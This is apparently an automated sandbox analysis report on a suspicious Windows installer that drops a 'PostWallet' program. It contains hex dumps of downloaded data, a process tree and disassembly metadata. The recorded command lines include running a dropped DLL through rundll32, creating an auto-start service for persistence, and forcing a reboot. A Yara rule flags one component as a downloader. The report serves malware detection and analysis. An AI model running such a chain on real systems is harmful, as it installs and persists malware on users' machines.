                                                  2024-03-07 09:47:30 UTC16384INData Raw: a6 69 a1 9a 5d 3d 60 47 5a 38 82 1e 43 ff f0 d8 db b1 04 f3 b1 2d 51 d8 23 29 5b 22 a9 ed 75 a5 b8 0f a5 4d 94 f7 c2 ef e4 91 98 5e 48 d4 cc ed 63 31 00 20 a9 5d e2 dc d1 ff 16 d0 fd 19 54 d2 e9 b1 19 a4 af ea 2b 25 2b 44 d8 73 15 74 b3 3f 5e 34 d6 85 ae 31 b3 27 5a 11 72 a2 a4 4f 85 d7 05 df 64 34 18 ee 2c 55 03 d0 39 85 c6 ef 43 d4 12 c1 40 f6 23 6b 6a 69 6f c4 0b 22 cc 49 68 7a 36 02 ba 55 c4 45 85 b8 7b f6 7a c2 b1 9f f9 3f af a4 2c 7e 38 6b f1 3b 83 e6 4b e7 3b 11 08 70 19 a9 1b bd d1 5b e5 5f 73 13 54 d7 50 c2 b4 2f 66 2e ab ec 4c 2e 3c 65 11 13 b2 6c 8d 3a e5 47 13 42 ce a1 e9 ed 34 c4 72 46 e2 54 01 d8 3f 68 68 14 10 84 2f 90 80 74 7d fd 48 a0 04 d7 b9 48 45 fe 29 af 64 7c a0 dc f8 3a 11 3f 7a c6 23 a2 20 a4 6a 8c dc 50 67 cb 13 4d 4d 9f 68 dd 6f
                                                  Data Ascii: i]=`GZ8C-Q#)["uM^Hc1 ]T+%+Dst?^41'ZrOd4,U9C@#kjio"Ihz6UE{z?,~8k;K;p[_sTP/f.L.<el:GB4rFT?hh/t}HHE)d|:?z# jPgMMho
                                                  2024-03-07 09:47:30 UTC1024INData Raw: ef 8a 6a 38 38 aa d6 99 8a 65 af 04 98 39 2c ee 9a 75 8a c5 a2 e7 b2 79 ed 98 f6 2f d9 15 a5 87 46 6a eb 96 fb 0e 4e 24 ae 4e 1b 01 3d 3e cd 6d e3 05 a0 63 46 5e e0 fe 93 89 0a 09 56 c0 bf 3c 41 28 48 25 e4 71 7a e9 69 ff 42 82 64 b8 37 cc cf 6c ac 53 86 d1 13 e5 e9 dd 3c c2 93 60 ce 56 53 5a 85 8f 04 07 29 c0 70 0b 06 cf 7c 86 c7 5d 4e 3b 18 aa d0 d5 21 4b ef 34 01 d7 7e 41 23 38 8a b1 01 d3 83 e4 90 fd bf 6b 81 9b 47 fe c5 31 a5 17 d6 27 82 cc dd 53 97 c8 95 ed 78 55 7f 40 4f cd be 47 75 cd 55 b7 fa 82 6e 06 b9 d6 56 a7 d7 4d 83 52 d0 06 58 ff db 18 91 5f be 9e 00 29 9b 1a f3 f8 bc 06 fa 0a d7 e7 26 d2 80 c5 af 39 ca 5b c3 07 34 bb 10 c3 ce 70 23 98 f6 e2 eb d3 8e 7b 91 81 82 2c 89 18 ef 38 6d 24 92 ad d7 fa 7b 50 0c d3 18 7b e0 6d 1e 2a b1 94 e8 9f 9a
                                                  Data Ascii: j88e9,uy/FjN$N=>mcF^V<A(H%qziBd7lS<`VSZ)p|]N;!K4~A#8kG1'SxU@OGuUnVMRX_)&9[4p#{,8m${P{m*
                                                  2024-03-07 09:47:30 UTC16384INData Raw: a8 43 d3 c0 3d d1 3b 6f d3 3f d1 d6 09 0a ba 7c 97 64 c8 9f b8 45 68 e6 77 e8 7a 86 31 2d ed 51 b7 b8 ae ec 7a cf 64 06 bf d9 e0 e6 c3 18 39 53 f1 0d be 64 ac 33 3d 5f cb 0c ca 13 13 2f 8b a9 6a 85 b5 a9 b9 72 cb 20 cb b9 4d af 6f 50 79 01 32 43 f0 b3 cb 80 12 41 2e dd 26 4a a8 9f 13 64 4a 97 29 47 b3 b6 31 05 c1 22 c6 f7 92 0c c0 3b 3c 85 d7 d3 5e 37 d1 85 56 85 60 d0 03 d0 bc 40 38 c6 d6 ef d8 a8 f1 5a 1e 4c 36 ca b1 5d eb e4 e7 94 06 06 a3 68 9b 93 ba 53 8d 99 e1 d2 97 40 31 18 34 b4 f9 7d d8 16 81 c3 cd cb 93 d2 ef 0f 6f c4 b4 db a1 5e 33 92 bb cb 0f 5f f5 db a4 0d 08 ae 51 ba 61 0d c9 9d e6 e8 c1 28 28 00 26 7b 69 e7 71 e4 72 e0 33 0a d1 6b ec cd 4f 30 ad ab 28 90 3d 29 6e de a9 bb 63 c3 d2 76 6c 8c e3 95 1f 23 aa 54 f2 01 58 ec c7 35 4d 87 73 14 2e
                                                  Data Ascii: C=;o?|dEhwz1-Qzd9Sd3=_/jr MoPy2CA.&JdJ)G1";<^7V`@8ZL6]hS@14}o^3_Qa((&{iqr3kO0(=)ncvl#TX5Ms.
                                                  2024-03-07 09:47:30 UTC1024INData Raw: ec f0 45 38 f0 f8 fb 83 ee 83 3a e2 19 b7 2f 63 e4 19 53 bf ae c4 2c eb 61 8e 76 d8 03 74 6e 64 87 2c 7b 31 b8 66 da a5 76 dc c9 0d 2d d8 a8 c3 8c ea 03 31 b4 fe fc eb 65 cb a1 9f 47 8a a5 d1 fb a4 bd 3c 31 c1 6d e9 eb f3 57 b7 43 73 92 92 e4 c2 0f da bc 5b 92 25 13 1f ff e4 3c ec 53 4c fc 00 44 bd b3 f2 e1 0b aa 88 10 7e cf b7 09 54 36 34 90 0e 96 94 7f ef df 7d 6b c6 0b df 2e 27 33 58 50 c2 5e aa df f9 10 9e 8f 56 fa 7d bb 19 2b c0 f5 67 a5 93 7f 7a b1 28 6d 85 e5 77 a8 b4 46 62 8d cb 46 2e 92 af 1e ee 80 66 8d d0 00 64 35 44 cb 03 4e 39 20 95 cc 46 53 34 f8 31 4a 45 55 12 83 42 a7 e7 a3 48 f4 6b b1 7c dd e2 3d 73 c3 62 d2 6f 34 6b 5e 04 4c c2 d2 35 dc fe ae dd ab ae 8a f5 de 70 8a b3 f3 ff 94 c0 f3 87 f2 b3 90 20 97 b5 fc 09 6c f5 ae a4 4c c2 e5 ce 57
                                                  Data Ascii: E8:/cS,avtnd,{1fv-1eG<1mWCs[%<SLD~T64}k.'3XP^V}+gz(mwFbF.fd5DN9 FS41JEUBHk|=sbo4k^L5p lLW
                                                  2024-03-07 09:47:30 UTC16384INData Raw: c5 79 67 4f 33 cc 5f 21 bd 32 d7 16 46 84 f2 2a f5 70 ff d3 df 97 83 d9 32 40 44 8e 4b d1 47 20 6b 91 6b 40 85 10 bd 6c 50 40 e4 f7 b4 75 06 c1 76 84 91 0d 28 77 40 51 16 fb 05 42 ac 83 8b 49 04 e0 d6 27 e9 bd 2c 58 b2 44 a3 a6 66 51 27 0d 7f f7 73 60 d3 0d 64 fb c5 66 05 a5 55 15 6b 76 b7 9d 04 74 7c 5b 18 cb 93 5f 61 f1 a6 2a 56 89 6b 2f 49 f3 a5 c0 26 54 54 e4 aa c6 26 ba ec f9 4f 73 e0 14 b7 ad 66 34 f1 67 9b 3e 1d 6f af fc 6b 6c be 4d 0e 7e 94 1a 06 e5 4b 12 de 97 c1 d0 7e 91 0d 69 60 0b 27 ef 37 97 9f be ad 2f 06 a9 01 6f 1f 06 40 30 f9 89 db e3 2c c7 db 29 56 94 b1 e6 72 b1 32 59 fc 43 51 ab d7 f0 6b 50 61 04 58 03 a6 b1 81 46 15 41 42 ca 52 cf 87 a5 f7 fc d1 bb 82 05 ca dd fa 26 5e 48 db 89 f3 d3 a0 5c b2 55 72 fa 56 7f bd 43 93 a8 64 35 2b d4 4b
                                                  Data Ascii: ygO3_!2F*p2@DKG kk@lP@uv(w@QBI',XDfQ's`dfUkvt|[_a*Vk/I&TT&Osf4g>oklM~K~i`'7/o@0,)Vr2YCQkPaXFABR&^H\UrVCd5+K


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:10:47:18
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:6'569'472 bytes
                                                  MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:10:47:18
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
                                                  Imagebase:0xe0000
                                                  File size:6'569'472 bytes
                                                  MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:10:47:19
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                                  Imagebase:0x150000
                                                  File size:1'899'520 bytes
                                                  MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:10:47:21
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
                                                  Imagebase:0xed0000
                                                  File size:89'392 bytes
                                                  MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:5
                                                  Start time:10:47:21
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:10:47:22
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
                                                  Imagebase:0xed0000
                                                  File size:89'392 bytes
                                                  MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:9
                                                  Start time:10:47:22
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:10
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:11
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:12
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                                  Imagebase:0xf40000
                                                  File size:61'440 bytes
                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:13
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\rundll32.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                                  Imagebase:0x7ff701af0000
                                                  File size:71'680 bytes
                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:14
                                                  Start time:10:47:35
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                                  Imagebase:0x7ff7018f0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:10:47:35
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:10:47:35
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                                  Imagebase:0x7ff72cce0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:10:47:44
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\shutdown.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                  Imagebase:0x7ff600fb0000
                                                  File size:28'160 bytes
                                                  MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:10:47:44
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:11%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:6.4%
                                                    Total number of Nodes:78
                                                    Total number of Limit Nodes:2
                                                    execution_graph 319 eab5c 322 eb0b8 319->322 321 eab61 321->321 323 eb0ce 322->323 325 eb0d7 323->325 326 eb06b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 323->326 325->321 326->325 327 e9c2d 328 e9c37 327->328 329 ea090 ___delayLoadHelper2@8 14 API calls 328->329 329->328 330 e9cbd 331 e9c8e 330->331 331->330 332 ea090 ___delayLoadHelper2@8 14 API calls 331->332 332->331 252 e9cdb 253 e9c8e 252->253 255 ea090 253->255 281 e9df1 255->281 257 ea0a0 258 ea0fd 257->258 259 ea121 257->259 290 ea02e 258->290 262 ea199 LoadLibraryExA 259->262 264 ea1fa 259->264 265 ea20c 259->265 275 ea2c8 259->275 263 ea1ac GetLastError 262->263 262->264 267 ea1bf 263->267 268 ea1d5 263->268 264->265 266 ea205 FreeLibrary 264->266 269 ea26a GetProcAddress 265->269 265->275 266->265 267->264 267->268 270 ea02e DloadReleaseSectionWriteAccess 6 API calls 268->270 271 ea27a GetLastError 269->271 269->275 272 ea1e0 RaiseException 270->272 273 ea28d 271->273 276 ea2f6 272->276 273->275 277 ea02e DloadReleaseSectionWriteAccess 6 API calls 273->277 274 ea02e DloadReleaseSectionWriteAccess 6 API calls 274->276 275->274 276->253 278 ea2ae RaiseException 277->278 279 e9df1 DloadAcquireSectionWriteAccess 6 API calls 278->279 280 ea2c5 279->280 280->275 282 e9dfd 281->282 283 e9e23 281->283 298 e9e97 282->298 283->257 286 e9e1e 306 e9e24 286->306 291 ea062 RaiseException 290->291 292 ea040 290->292 291->276 293 e9e97 DloadReleaseSectionWriteAccess 3 API calls 292->293 294 ea045 293->294 295 ea05d 294->295 296 e9fc0 DloadProtectSection 3 API calls 294->296 316 ea064 295->316 296->295 299 e9e24 DloadGetSRWLockFunctionPointers 3 API calls 298->299 300 e9e02 299->300 300->286 301 e9fc0 300->301 303 e9fd5 DloadObtainSection 301->303 302 e9fdb 302->286 303->302 304 ea010 VirtualProtect 303->304 312 e9ed6 VirtualQuery 303->312 304->302 307 e9e47 306->307 308 e9e32 306->308 307->257 308->307 309 e9e36 GetModuleHandleW 308->309 309->307 310 e9e4b GetProcAddress 309->310 310->307 311 e9e5b GetProcAddress 310->311 311->307 313 e9ef1 312->313 314 e9efc GetSystemInfo 313->314 315 e9f33 313->315 314->315 315->304 315->315 317 e9e24 DloadGetSRWLockFunctionPointers 3 API calls 316->317 318 ea069 317->318 318->291 340 e9c52 341 e9c37 340->341 341->340 342 ea090 ___delayLoadHelper2@8 14 API calls 341->342 342->341 343 e9cb3 344 e9c8e 343->344 345 ea090 ___delayLoadHelper2@8 14 API calls 344->345 345->344 346 e9d21 347 e9d2b 346->347 348 ea090 ___delayLoadHelper2@8 14 API calls 347->348 349 e9d38 348->349

                                                    Callgraph

                                                    Executed Functions

                                                    Function 000E9CBD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 5 e9cbd-e9cc2 6 e9c8e-e9c96 call ea090 5->6 8 e9c9b-e9c9c 6->8 8->5
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 000E9C96
                                                      • Part of subcall function 000EA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000EA09B
                                                      • Part of subcall function 000EA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EA103
                                                      • Part of subcall function 000EA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EA114
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2009734496.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 00000000.00000002.2009638866.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009763180.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009784071.000000000010A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009808594.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e0000_00023948209303294#U00ac320302282349843984903.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID:
                                                    • API String ID: 697777088-0
                                                    • Opcode ID: 067c1ece88366fcaac817d06669fffcbe9c192e4a8c88cc89c5c07856cbaaa15
                                                    • Instruction ID: bca13ecb074455e94f2e612f7e780a03d3a5f3306c210b6c955f65f08c2b8fb5
                                                    • Opcode Fuzzy Hash: 067c1ece88366fcaac817d06669fffcbe9c192e4a8c88cc89c5c07856cbaaa15
                                                    • Instruction Fuzzy Hash: 24B012A235C6416DB528B1261E02D3B028CD6C5B10331482BF084E50C2DDC02C400133
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000E9CDB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 14 e9cdb-e9ce0 15 e9c8e-e9c96 call ea090 14->15 17 e9c9b-e9cc2 15->17 17->15
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 000E9C96
                                                      • Part of subcall function 000EA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000EA09B
                                                      • Part of subcall function 000EA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EA103
                                                      • Part of subcall function 000EA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EA114
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2009734496.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 00000000.00000002.2009638866.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009763180.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009784071.000000000010A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009808594.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e0000_00023948209303294#U00ac320302282349843984903.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID:
                                                    • API String ID: 697777088-0
                                                    • Opcode ID: 90beaf49f289ce1e23883862aa0308daa832fce2cb3054f4bb78fe9d418b4900
                                                    • Instruction ID: dcdbe194f95cde233587f069446d61896425a0769166525efe36d19a0be10273
                                                    • Opcode Fuzzy Hash: 90beaf49f289ce1e23883862aa0308daa832fce2cb3054f4bb78fe9d418b4900
                                                    • Instruction Fuzzy Hash: B4B012A135C2416DB538B1261E02D3B024CD6C6B10331482AF080E50C2DDC03CC00033
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000E9CB3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 e9cb3-e9cb8 1 e9c8e-e9c96 call ea090 0->1 3 e9c9b-e9cc2 1->3 3->1
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 000E9C96
                                                      • Part of subcall function 000EA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000EA09B
                                                      • Part of subcall function 000EA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EA103
                                                      • Part of subcall function 000EA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EA114
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2009734496.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 00000000.00000002.2009638866.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009763180.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009784071.000000000010A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009808594.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e0000_00023948209303294#U00ac320302282349843984903.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID:
                                                    • API String ID: 697777088-0
                                                    • Opcode ID: 87aaea78d69ca30c83bc05722854c28430be2ed5229ef613a96814a55c2c9aaa
                                                    • Instruction ID: 589fd6217a72901484abc01a3294cad340a81815ca411c32991ebab25294c7c3
                                                    • Opcode Fuzzy Hash: 87aaea78d69ca30c83bc05722854c28430be2ed5229ef613a96814a55c2c9aaa
                                                    • Instruction Fuzzy Hash: 1CB012A135C6416DB528B1361E02D3F028CC7C5B103318C2AF484E50C2DEC02C400133
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000E9CD1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 9 e9cd1-e9cd6 10 e9c8e-e9c96 call ea090 9->10 12 e9c9b-e9cc2 10->12 12->10
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 000E9C96
                                                      • Part of subcall function 000EA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000EA09B
                                                      • Part of subcall function 000EA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EA103
                                                      • Part of subcall function 000EA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EA114
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2009734496.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 00000000.00000002.2009638866.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009763180.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009784071.000000000010A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2009808594.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e0000_00023948209303294#U00ac320302282349843984903.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID:
                                                    • API String ID: 697777088-0
                                                    • Opcode ID: d0042902459aebfbcd80376d089e66a87aa49fa958a7ec80e68336e6c8ba9511
                                                    • Instruction ID: 12857d82a2a469f1250d8102ee63fb4b78e22fece199d66df38467d7c1f718dd
                                                    • Opcode Fuzzy Hash: d0042902459aebfbcd80376d089e66a87aa49fa958a7ec80e68336e6c8ba9511
                                                    • Instruction Fuzzy Hash: 4AB012E135C2416DB53CB1265F02D3B024CD6C6B10331442AF080E50C2DDC03C810033
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    Function 00007FF848F30F18 Relevance: 18.4, Strings: 14, Instructions: 940COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$rS_H$wS_H
                                                    • API String ID: 0-3966687389
                                                    • Opcode ID: 1b28b1187615c6d4f05f4bd1bc71d1e77ee57c58c6de7432a3984d843a8e7b02
                                                    • Instruction ID: 61775a4ae554ce91fb89b04a5e35c836ab746c9b7c4a219cc1f060c1200e9384
                                                    • Opcode Fuzzy Hash: 1b28b1187615c6d4f05f4bd1bc71d1e77ee57c58c6de7432a3984d843a8e7b02
